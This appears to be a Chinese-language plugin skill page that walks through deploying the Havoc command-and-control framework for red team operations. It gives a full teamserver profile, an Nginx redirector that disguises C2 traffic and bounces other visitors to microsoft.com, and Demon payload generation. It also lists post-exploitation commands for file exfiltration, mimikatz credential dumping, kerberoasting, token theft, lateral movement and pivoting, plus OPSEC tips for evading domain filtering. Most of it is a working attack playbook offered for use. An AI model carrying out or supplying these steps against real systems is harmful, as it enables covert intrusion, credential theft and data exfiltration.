npx claudepluginhub killvxk/cybersecurity-skills-zhThis skill uses the workspace's default tool permissions.
Havoc 是由 C5pider 创建的现代开源后渗透(post-exploitation)命令与控制(C2)框架。它提供类似于 Cobalt Strike 的协作式多操作员界面,具备适用于 Windows 后渗透的 Demon 代理、流量可塑性(malleable)配置的自定义配置文件,以及对 HTTP/HTTPS/SMB 监听器的支持。本技能涵盖为授权红队演练部署生产级 Havoc C2 基础设施,并考虑适当的操作安全(OPSEC)要素。
Deploys and configures Havoc C2 framework with teamserver, HTTPS listeners, Nginx redirectors, and Demon agents for authorized red team operations.
Deploys and configures Havoc C2 framework with teamserver, HTTPS listeners, redirectors, and Demon agents for authorized red team operations. Useful for production-grade red team infrastructure.
Automates Covenant C2 framework for authorized red team operations: authenticates to API, creates HTTP/HTTPS listeners, generates PowerShell/binary launchers, deploys Grunts, executes tasks, tracks lateral movement.
Share bugs, ideas, or general feedback.
Havoc 是由 C5pider 创建的现代开源后渗透(post-exploitation)命令与控制(C2)框架。它提供类似于 Cobalt Strike 的协作式多操作员界面,具备适用于 Windows 后渗透的 Demon 代理、流量可塑性(malleable)配置的自定义配置文件,以及对 HTTP/HTTPS/SMB 监听器的支持。本技能涵盖为授权红队演练部署生产级 Havoc C2 基础设施,并考虑适当的操作安全(OPSEC)要素。
┌──────────────────────────────────────────────────────────────┐
│ HAVOC C2 架构 │
├──────────────────────────────────────────────────────────────┤
│ │
│ ┌──────────┐ ┌──────────────┐ ┌──────────────────┐ │
│ │ Havoc │────▶│ HTTPS │────▶│ 目标网络 │ │
│ │ 客户端 │ │ 重定向器 │ │ (Demon 代理) │ │
│ │ (Kali) │ │ (Nginx/CDN) │ │ │ │
│ └──────────┘ └──────────────┘ └──────────────────┘ │
│ │ │ │
│ │ ┌──────────────┐ │
│ └──────────▶│ Havoc │ │
│ │ 团队服务器 │ │
│ │ (Ubuntu VPS)│ │
│ │ 端口 40056 │ │
│ └──────────────┘ │
│ │
└──────────────────────────────────────────────────────────────┘
# 克隆 Havoc 仓库
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc
# 安装依赖(Ubuntu 22.04)
sudo apt update
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 \
libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev \
libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev \
libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser \
qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev \
qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev \
python3-dev libboost-all-dev mingw-w64 nasm
# 构建团队服务器
cd teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build
# 构建客户端
make client-build
创建 Havoc 配置文件(havoc.yaotl):
Teamserver {
Host = "0.0.0.0"
Port = 40056
Build {
Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
Nasm = "/usr/bin/nasm"
}
}
Operators {
user "operator1" {
Password = "Str0ngP@ssw0rd!"
}
user "operator2" {
Password = "An0th3rP@ss!"
}
}
Listeners {
Http {
Name = "HTTPS Listener"
Hosts = ["c2.yourdomain.com"]
HostBind = "0.0.0.0"
HostRotation = "round-robin"
PortBind = 443
PortConn = 443
Secure = true
UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
Uris = [
"/api/v2/auth",
"/api/v2/status",
"/content/images/gallery",
]
Headers = [
"X-Requested-With: XMLHttpRequest",
"Content-Type: application/json",
]
Response {
Headers = [
"Content-Type: application/json",
"Server: nginx/1.24.0",
"X-Frame-Options: DENY",
]
}
}
}
Demon {
Sleep = 10
Jitter = 30
TrustXForwardedFor = false
Injection {
Spawn64 = "C:\\Windows\\System32\\notepad.exe"
Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
}
}
# 使用配置文件启动 Havoc 团队服务器
./havoc server --profile ./profiles/havoc.yaotl -v
# 预期输出:
# [*] Havoc Framework [Version: 0.7]
# [*] Teamserver started on: 0.0.0.0:40056
# [*] HTTPS Listener started on: 0.0.0.0:443
在独立 VPS 上设置 Nginx 反向代理作为重定向器:
# /etc/nginx/sites-available/c2-redirector
server {
listen 443 ssl;
server_name c2.yourdomain.com;
ssl_certificate /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;
# 仅转发匹配 C2 URI 的流量
location /api/v2/auth {
proxy_pass https://TEAMSERVER_IP:443;
proxy_ssl_verify off;
proxy_set_header Host $host;
proxy_set_header X-Forwarded-For $remote_addr;
}
location /api/v2/status {
proxy_pass https://TEAMSERVER_IP:443;
proxy_ssl_verify off;
proxy_set_header Host $host;
}
location /content/images/gallery {
proxy_pass https://TEAMSERVER_IP:443;
proxy_ssl_verify off;
proxy_set_header Host $host;
}
# 将所有其他流量重定向到合法站点
location / {
return 301 https://www.microsoft.com;
}
}
# 通过 Havoc 客户端 GUI:
# Attack > Payload
# Agent: Demon
# Listener: HTTPS Listener
# Arch: x64
# Format: Windows Exe / Windows Shellcode
# Sleep Technique: WaitForSingleObjectEx (Ekko)
# Spawn: C:\Windows\System32\notepad.exe
# 生成的 Demon 载荷通过以下路径回连:
# 目标 -> 重定向器 (Nginx) -> 团队服务器
Demon 会话接入后,常用的后渗透命令:
# 会话交互
demon> whoami
demon> shell systeminfo
demon> shell ipconfig /all
# 进程列表
demon> proc list
# 文件操作
demon> download C:\Users\target\Documents\sensitive.docx
demon> upload /tools/Rubeus.exe C:\Windows\Temp\r.exe
# 内存中执行 .NET(不落盘)
demon> dotnet inline-execute /tools/Seatbelt.exe -group=all
demon> dotnet inline-execute /tools/SharpHound.exe -c All
# 令牌操控
demon> token steal <PID>
demon> token make DOMAIN\user password
# 凭据访问
demon> mimikatz sekurlsa::logonpasswords
demon> dotnet inline-execute /tools/Rubeus.exe kerberoast
# 横向移动(Lateral Movement)
demon> jump psexec TARGET_HOST HTTPS_LISTENER
demon> jump winrm TARGET_HOST HTTPS_LISTENER
# 枢纽(Pivoting)
demon> socks start 1080
demon> rportfwd start 8080 TARGET_INTERNAL 80
| 方面 | 建议 |
|---|---|
| 域名年龄 | 在演练前 30 天以上注册域名 |
| SSL 证书 | 使用 Let's Encrypt 或购买的证书,绝不使用自签名证书 |
| 分类 | 将域名提交至 Bluecoat/Fortiguard 进行分类 |
| 休眠/抖动 | 长期行动最低 10 秒休眠,抖动 30% 以上 |
| User-Agent | 与目标组织的常用浏览器 User-Agent 匹配 |
| 失效日期 | 将载荷过期时间设置为演练结束日期 |
| 基础设施 | 分开团队服务器、重定向器和钓鱼基础设施 |
| 载荷格式 | 使用带有自定义加载器的 shellcode,而非原始 EXE |
| 技术 ID | 名称 | 阶段 |
|---|---|---|
| T1583.001 | 获取基础设施:域名 | 资源开发 |
| T1583.003 | 获取基础设施:虚拟私人服务器 | 资源开发 |
| T1587.001 | 开发能力:恶意软件 | 资源开发 |
| T1071.001 | 应用层协议:Web 协议 | 命令与控制 |
| T1573.002 | 加密信道:非对称加密 | 命令与控制 |
| T1090.002 | 代理:外部代理 | 命令与控制 |
| T1105 | 入侵工具传输 | 命令与控制 |
| T1055 | 进程注入(Process Injection) | 防御规避 |